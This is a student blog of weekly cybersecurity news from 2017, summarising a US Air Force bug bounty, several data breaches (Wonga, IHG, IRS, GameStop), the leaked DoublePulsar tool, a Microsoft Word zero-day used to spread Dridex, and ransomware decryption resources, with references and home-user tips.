Bug Bounty plus UK Data Breach

Introduction

For Week 7 there has been interesting news articles. Of course there is another data breach, but this one happened outside of the United States. The Unites States Air Force has been following the other branches of the military and will start their own bug bounty program. 

Bug Bounty

The United States Air Force has started a bug bounty program. The bug bounty program is designed to pay hackers or security researchers to find vulnerabilities on their systems. The pay is based on the vulnerabilities found and how critical they are. Hackers and security researchers are invited from the United States and five other countries. The countries are the United Kingdom, Canada, Australia, and New Zealand (Kumar, 2017). For the “Hack the Air Force” program people must go through a background check and not have a criminal record. The reason for the background check and no criminal record is because people could access top secret materials and exfiltrate data. This will be one of the largest bug bounty programs put on by the United States military.

Allowing hackers inside the military network is a great idea! The best part is that if the hackers don’t find anything the military doesn’t need to pay them. The last event per the article had over 14,000 hackers and they found 138 vulnerabilities, plus 75,000 dollars was paid out in reward money (Kumar, 2017). Giving hackers a chance to use their skills to get paid is awesome! Hackers usually break into systems or steal information because they are bored or they want to make more money. Problems with this are vulnerabilities can be leaked out or information taken if a person is not ethical. In the end, paying individuals instead of a company can result in more vulnerabilities being found depending on the skill of the person.

https://www.hackerone.com/sites/default/files/inline-images/hack-the-air-force.png

Payday Loan Breach

A payday loan provider called Wonga has had its customer’s data stolen. Around 245,000 Wonga customers in the United Kingdom and 25,000 Wonga customers in Poland have been affected by the breach (Lomas, 2017). There is no information about how Wonga was broken into, but there will be more information in the following weeks. Wonga’s site has information about the data breach located at https://www.wonga.com/help/incident-faq. The hackers may have gotten access to people’s names, email addresses, home addresses, phone numbers, the last four numbers of their credit / debit card and or bank account numbers, plus the sort codes (Lomas, 2017). Wonga believes that passwords weren’t taken during the incident, but as a safety precaution, they want everyone to change their passwords.

The data breach happened on April 7, 2017, but there has been no update as to how the hackers got in. They will not release the information because it could be damaging to the company. An educated guess would be Wonga left a security hole in an external facing site. United Kingdom businesses in 2018 are going to want to better protect their customer’s data because of an upcoming law. The new EU law will require companies notify the data protection authorities with 3 days or face a fine up to 10 million euros (Lomas, 2017). Some people have even said that the hackers won’t get much from the company’s customers because they don’t have much money.  Without knowing how the breach occurred it is hard to say if the issue can be fixed.

Summary

If a company can’t hire their own internal security engineers, they need to pay companies to look at their security. The internet is not going away and with customers wanting more convenience, cyber security will only get more important. With the United Kingdom implementing new laws that companies must report data breaches is a new concept. The United States does not have laws like the United Kingdom, but they are coming. Soon there will be a branch of the FBI that will investigate data breaches and fines if people’s personal information is not kept “up to code”.  The other problem is every company wants all types of information and most of it is not stored correctly. The way the information is stored in some industries is not regulated at the current moment in the United States.

References

Lomas, N. (2017, April 10). Payday loan firm Wonga suffers data breach affecting up to 270,000. Retrieved April 29, 2017, from https://techcrunch.com/2017/04/10/pay-day-loan-firm-wonga-suffers-data-breach-affecting-up-to-270000/

Kumar, M. (2017, April 27). Hack'em If You Can - U.S. Air Force launches Bug Bounty Program. Retrieved April 29, 2017, from http://thehackernews.com/2017/04/hack-the-air-force.html

IHG Data Breach and NSA Hacking Tools Week 6

For week 6 I have two items to discuss. The first is the IHG or InterContinental Hotel Group data breach and the second is how the leaked NSA tools are being used to attack Windows PC’s.  IHG had a breach back in December of 2016 and IHG said the data breach only affect a few of its properties. Now in April 2017, IHG has released data showing that more than 1,000 IHG properties were affected by the data breach. IHG properties computer systems were compromised with malicious software designed to siphon customer debit and credit card data just let Target and Home Depot (Krebs, 2017). IHG has been in the process of implementing a secure payment solution that will encrypt customer's data end to end.  Unfortunately, IHG only had a few sites done at the time on the data breach and they were not affected. PCI has a requirement for point-to-point encryption, so it seems IHG is behind on their PCI requirements. At the following site, a person can look up what IHG properties were affected by the data breach and the dates https://www.ihg.com/content/us/en/customer-care/protecting-our-guests/property-listing. The site can be used by a person to see if their credit or debit card was affected and if they need to be on the lookout for fraudulent charges. Below is a screenshot of an email sent to franchise hotel’s offering a forensic investigation to be paid by IHG (Krebs, 2017).

https://krebsonsecurity.com/2017/04/intercontinental-hotel-chain-breach-expands/

The leaked NSA hacking tools are being used in the wild. A hacker group called Shadow Brokers has leaked hacking tools that supposedly belonged to the NSA’s Equation Group (Khandelwal, 2017).  A piece of malware designed by the NSA called DoublePulsar was one of the tools released by Shadow Brokers. DoublePulsar is being used as a spying tool and it is installed because of vulnerable SMB and RDP versions. DoublePulsar does not write any files to the computer to remain stealthy and DoublePulsar acts a remote access Trojan. A person has released a python script to test IP addresses to see if they have the DoublePulsar infection.  The python script is located at https://github.com/countercept/doublepulsar-detection-script. Below is a screenshot of someone who ran the python script and found computer infected with DoublePulsar. 

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimJXQ4EXZB3KXGEmzjWCJiAzRrz_u9oyTL7Hyq2KdtJQDgXUMPs_5TaMxTacklYnjOwed41c9vU82CkPVHNbZnDijjoCtR_7AiYxn36X6W247IXXIq4aCxrvoOf9y_rILKljkLlFlCOzfD/s1600/windows-hacking-tools.png

The numbers of how many machines are affected have been varying, but it seems to be at least 30,000 machines are infected. Microsoft has released patches to fix SMB and RDP vulnerabilities. If people are still using an end of life software such as Windows XP and Windows Server 2003 they are vulnerable and will remain vulnerable because they will not receive security patches (Khandelwal, 2017). Script kiddies and other hackers will be able to freely use DoublePulsar to infect machines and make them zombies until the patch from Microsoft has been applied.

With hotels and businesses not encrypting credit card data end to end data breaches will continue to happen. One item that will not show up in the news articles is how the malware got install on the machines. Some organizations do not have a good security and I know for a fact at one hotel computers are not locked down at all. It seems organizations would rather have a data breach then pay for security because it is cheaper. People have the stigma that if a company has a data breach it is bad, but because, so many are happening it is just another day. Look at Target and Home Depot; people still shop there after they have had a massive data breach. People will continue to stay at IHG properties and if they have stock there may be a blip in it, but it will come back. At the end of the day, security needs to be a priority for businesses that store or transport customers data.

References

Krebs, B. (2017, April 18). Krebs on Security. Retrieved April 23, 2017, from https://krebsonsecurity.com/2017/04/intercontinental-hotel-chain-breach-expands/

Khandelwal, S. (2017, April 22). Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. Retrieved April 23, 2017, from http://thehackernews.com/2017/04/windows-hacking-tools.html

IRS Data Breach + Zero Day Week 5

During week 5 of CYBR 650 there has been plenty of security news. The blog this week will touch on a Microsoft zero day vulnerability and a data breach that happened at the IRS.  This Microsoft zero day vulnerability is in Microsoft Office and allows remote code execution to take place. This vulnerability affects all current versions of Microsoft Office, which includes Office 2016. The vulnerability was first found by Ryan Hanson in July of 2016. McAfee reported the zero day on Friday, but said Microsoft has known about it since January (Goodin, 2017). Hackers are now using this vulnerability to spread banking malware called Dridex. A word document that has been specially crafted can be executed on a computer, which allows an attacker to run code. The word document containing a malicious OLE2link object is how the attack starts. This specific attack runs the exploit code then makes a connection out to a remote server, where a malicious HTML application file or HTA gets downloaded (Khandelwal, 2017). Once the HTA file gets downloaded it runs and downloads different pieces of malware designed to gain control of the computer or steal credentials.  Below is a screenshot of a phishing email that contains a malicious word document.

https://arstechnica.com/security/2017/04/microsoft-word-0day-used-to-push-dangerous-dridex-malware-on-millions/

            Microsoft has released a patch yesterday to fix the vulnerability. This will stop the code from running if an email of the word document gets through the security controls. The worst part about this zero day is Microsoft has known about this and did not fix it. The fix only came out after hackers were using it to spread malware via emailing a word document. ProofPoint saw the new malware campaign and was able to block the malicious word document.

            The Internal Revenue Service or IRS has had a data breach that may affect up to 100,000 people. The IRS has a tool for FAFSA or Free Application Federal Student Aid that hackers have exploited. The tool for FAFSA helped family and students complete the form because it is lengthy. Since I’m I have gotten my associates, bachelors and currently getting my masters I have had to fill out the FASFA forums. The FASFA forums are long and are a pain to fill out.  According to Krebs on Security fraudsters may have been using the tool to get AGI or adjusted gross income (Krebs, 2017). The IRS has disabled the tool because people were starting to use it for fraud. The tool is called the IRS Data Retrieval Tool or DRT. John Koshinen went before the Senate Finance Committee to testify that less than 8,000 fraudulent returns were processed by the IRS (Cohn, 2017).

            The good thing is the tool is expected to be back online, but not till October. Does the IRS run any penetration tests or security testing? It seems like their tools are put into production without any testing and it is causing people to lose their personal information. The IRS needs to provide protection to the users that were affected from the breach. Companies that have had a data breach have provided identity theft protection, but the government does not provide these protections.

References

Goodin, D (2017, April 11). Microsoft Word 0-day used to push dangerous Dridex malware on millions. Retrieved April 13, 2017, from https://arstechnica.com/security/2017/04/microsoft-word-0day-used-to-push-dangerous-dridex-malware-on-millions/

Cohn, M. (2017, April 10). Data breach of IRS student financial aid tool may have affected 100,000 taxpayers. Retrieved April 13, 2017, from https://www.accountingtoday.com/news/data-breach-of-irs-student-financial-aid-tool-could-have-affected-100-000-taxpayers

Krebs, B. (2017, March 21). Krebs on Security. Retrieved April 13, 2017, from https://krebsonsecurity.com/2017/03/student-aid-tool-held-key-for-tax-fraudsters/

Khandelwal, S. (2017, April 11). Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan. Retrieved April 13, 2017, from http://thehackernews.com/2017/04/microsoft-word-dridex-trojan.html

GameStop Breach + Ransomware

This week blog comes fresh off the press because a data breach happened yesterday. Gamestop.com is looking into a possible data breach of their websites. A third party notified GameStop that its customer’s credit card data was being sold on a website. Krebs’s financial sources say they have received alerts of fraud coming from gamestop.com. This does not affect in store purchases only purchases made from GameStop’s website Gamestop.com. According to Krebs’s customer card number, expiration date, name, address and card verification value (CVV2) were compromised (Krebs, 2017). The CVV2 is the three digit number on the back of credit and debit cards, which is used for security. Merchants are not supposed to store the CVV2 numbers, but that does not mean hackers can use software to get the number before it is encrypted (Petite, 2017).  GameStop has hired a security firm to investigate the data breach that happened between September 2016 and February 2017.

GameStop told customers to basically watch credit card and bank statements for authorized charges. The problem with looking at paper credit card and bank statements is they are monthly, which would give the bad guy plenty of time to buy items. If a person’s bank or credit card has a way to check purchases from an online interface (Online Banking) that would be a better way to check instead of paper statements. If the breach does turn out to be from GameStop I would hope GameStop offers to replace all the credit and debit cards affected from the breach.

Without knowing more about the breach (I’m sure more will come out in a couple weeks) it’s hard to say how the attackers were able to get the information. Most likely GameStop did not have security as part of building the website and there was a vulnerability, which allowed the attackers access to the data. I will update the blog once more information has been shared. Lately it has been quiet, but there will be more data breaches for the year of 2017.

Another subject I want to touch on is Ransomware. A project call No More Ransom (NMR) started collecting decryption tools and keys for Ransomware. The project was started by Europol, the Dutch National Police, Intel Security and Kaspersky Lab (Kumar, 2017). The project allows teaching users about ransomware and provides decryption tools, so that users can get their files back. According to the article the platform is available in 14 languages and it has over 40 free decryption tools (Kumar, 2017).  The website is located at https://www.nomoreransom.org/.

http://core0.staticworld.net/images/article/2014/01/cryptolocker-100222101-orig.png

With ransomware being the new way for attackers to make money there have been several variants. I have only heard of CryptoLocker , CryptoWall, and Locky, but some other names are Cerber, Crysis, CTB-Locker, Jigsaw, KeRanger, LeChiffre, TelsaCrypt, TorrentLocker, and ZCryptor (Brunau , 2017). I found the Jigsaw ransomware name interesting and decided to do more research. Jigsaw is a nasty type of ransomware that gives a user three days to pay the 150 dollars in bitcoin, but there is more. Jigsaw will start deleting files every hour until the payment is received. If no payment is received Jigsaw will delete all the encrypted files. If a person attempts to change registry settings or attempts to shut off the computer, Jigsaw will make the time jump 24 hours ahead. A person is only given three chances before all the files are deleted.  

A youtube video seen upload can be found at the founding link https://www.youtube.com/watch?v=cbHcDgMtA0k and it shows how to decrypt Cerber ransomware. I’m glad the project No More Ransom was setup to help people decrypt their files. For a default computer user they have no safe guards to protect their computer against ransomware. With these tools users can get away without paying the attackers, which is why ransomware is still around.  Tips for home users to protect themselves from ransomware:

1.    Ransomware mostly comes from emails, so be careful and look for spam emails

2.    Have two accounts one for regular use and another made to install applications

3.     Create backups using either backup software or online backups

References

Krebs, B. (2017, April 07). Krebs on Security. Retrieved April 08, 2017, from https://krebsonsecurity.com/2017/04/gamestop-com-investigating-possible-breach/#more-38927).

Petite, S. (2017, April 07). GameStop.com customers' credit card information may have been compromised. Retrieved April 08, 2017, from http://www.digitaltrends.com/gaming/gamestop-online-security-breach

Kumar, M. (2017, April 05). No More Ransom - 15 New Ransomware Decryption Tools Available for Free. Retrieved April 08, 2017, from http://thehackernews.com/2017/04/decrypt-ransomware-files-tool.html

Brunau, C. (2017, March 01). Common Types of Ransomware. Retrieved April 08, 2017, from https://www.datto.com/blog/common-types-of-ransomware